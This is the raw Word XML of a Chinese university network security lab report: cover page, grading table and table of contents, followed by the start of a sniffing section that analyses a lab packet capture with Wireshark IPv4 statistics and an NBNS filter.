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16" w:beforeLines="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="616" w:beforeLines="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="616" w:beforeLines="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>“网络安全综合实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:instrText xml:space="preserve">= 3 \* ROMAN</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>III</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single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983615</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>61595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3810635" cy="2491740"/>
                <wp:effectExtent l="4445" t="4445" r="10160" b="18415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635" cy="249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1.严格按照模板格式包括行距、字体、段落格式等等，不符合</w:t>
                            </w:r>
                            <w:r>
                              <w:t>模板规范则</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>扣分!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2.封面要一致(上面有评分项)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3.报告内容</w:t>
                            </w:r>
                            <w:r>
                              <w:t>包括：</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>封面 目录  内容  总结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4.评分分为：撰写规范性 实验过程 问题分析与小结</w:t>
                            </w:r>
                          </w:p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5.共</w:t>
                            </w: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次课</w:t>
                            </w:r>
                            <w:r>
                              <w:t>，四个</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>部分，电子档收集后交由本班学委，由学位打包交给老师；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  <w:p>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>6.1</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>701—韩兰胜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、1</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>702—李伟明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、1</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>703—王美珍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77.45pt;margin-top:4.85pt;height:196.2pt;width:300.05pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" fillcolor="#FFFFFF" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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L3YHFNgAAAAJAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAA&#10;AAgAh07iQDa5R+coAgAAOgQAAA4AAAAAAAAAAQAgAAAAJw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1.严格按照模板格式包括行距、字体、段落格式等等，不符合</w:t>
                      </w:r>
                      <w:r>
                        <w:t>模板规范则</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>扣分!</w:t>
                      </w:r>
                    </w:p>
                    <w:p>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>2.封面要一致(上面有评分项)</w:t>
                      </w:r>
                    </w:p>
                    <w:p>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>3.报告内容</w:t>
                      </w:r>
                      <w:r>
                        <w:t>包括：</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>封面 目录  内容  总结</w:t>
                      </w:r>
                    </w:p>
                    <w:p>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>4.评分分为：撰写规范性 实验过程 问题分析与小结</w:t>
                      </w:r>
                    </w:p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</w:rPr>
                        <w:t>5.共</w:t>
                      </w:r>
                      <w:r>
                        <w:t>8</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>次课</w:t>
                      </w:r>
                      <w:r>
                        <w:t>，四个</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>部分，电子档收集后交由本班学委，由学位打包交给老师；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  <w:p>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>6.1</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>701—韩兰胜</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>、1</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>702—李伟明</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>、1</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>703—王美珍</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                          <w:color w:val="FF000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hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single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班    级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　 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 xml:space="preserve">IS1703　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>　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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pacing w:val="281"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="0"/>
        </w:rPr>
        <w:t>姓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="0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　　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徐立威</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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pacing w:val="281"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="1"/>
        </w:rPr>
        <w:t>学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="1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>　　　U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>201714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513</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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1"/>
        <w:gridCol w:w="1283"/>
        <w:gridCol w:w="1195"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="1134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1" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto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项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr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撰写规范</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1195" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr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实验过程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr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问题分析与小结</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr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总分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr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教师签字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1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分值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283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1195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2126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1134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100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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1" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="205" w:beforeLines="5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评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p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195" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p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auto"/>
          </w:tcPr>
          <w:p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373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p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/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/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0375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_Toc6552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</w:rPr>
            <w:t>网络嗅探</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6552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_Toc14146 </w:instrText>
          </w:r>
          <w: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eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>实验过程记录</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14146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_Toc3986 </w:instrText>
          </w:r>
          <w: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eastAsia"/>
            </w:rPr>
            <w:t>实验问题分析与总结</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3986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_Toc4906 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">1.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>建议与意见</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4906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_Toc16761 </w:instrText>
          </w:r>
          <w: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</w:rPr>
            <w:t>软件逆向</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc16761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_Toc12085 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">2.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>实验过程记录</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12085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_Toc20540 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">2.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>实验问题分析与总结</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20540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_Toc29160 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">2.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>建议与意见</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29160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_Toc29774 </w:instrText>
          </w:r>
          <w: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/>
            </w:rPr>
            <w:t>漏洞挖掘与利用</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29774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_Toc5580 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">3.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>实验过程记录</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc5580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_Toc23155 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">3.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>实验问题分析与总结</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23155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_Toc26503 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">3.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>建议与意见</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26503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_Toc27620 </w:instrText>
          </w:r>
          <w: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/>
            </w:rPr>
            <w:t>补丁技术</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27620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_Toc26096 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">4.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>实验过程记录</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26096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_Toc1172 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">4.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>实验问题分析与总结</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1172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_Toc23490 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default"/>
            </w:rPr>
            <w:t xml:space="preserve">4.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>建议与意见</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23490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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc6552"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络嗅探</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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1" w:name="_Toc14146"/>
      <w:bookmarkStart w:id="2" w:name="_Toc22006"/>
      <w:bookmarkStart w:id="3" w:name="_Toc10708"/>
      <w:bookmarkStart w:id="4" w:name="_Toc164150360"/>
      <w:bookmarkStart w:id="5" w:name="_Toc45180073"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/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流量统计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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Wireshark加载之后，点击上方菜单统计--&gt;ipv4 statistics--&gt;all address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确定IP地址范围</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，如图1.1。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从图中可以看出主要观察192.168.2.222、192.168.2.235、192.168.2.183、192.168.2.1。根据已知信息，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据包是在靶机192.168.2.222上截的包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"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5267960" cy="2832735"/>
            <wp:effectExtent l="0" t="0" r="5080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图1.1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6" w:name="_Toc1784"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获得主机信息：IP、域名、用户名等信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/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bookmarkStart w:id="7" w:name="_Toc16949"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nbns过滤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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根据实验要求，我们要对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>靶机192.168.2.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2的攻击手段进行分析，通过过滤nbns信息，可以查看到查询域的报文信息（端口为137），如图1.2。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2582545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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图1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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第一条发现1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2.16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.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起了一个广播包，主机名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WORKGROUP，目的ip为192.168.2.255，说明这是广播包，用于NBNS广播查找。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="159385"/>
            <wp:effectExtent l="0" t="0" r="1905" b="825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097780" cy="792480"/>
            <wp:effectExtent l="0" t="0" r="762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图1.3</w:t>
      </w:r>
    </w:p>
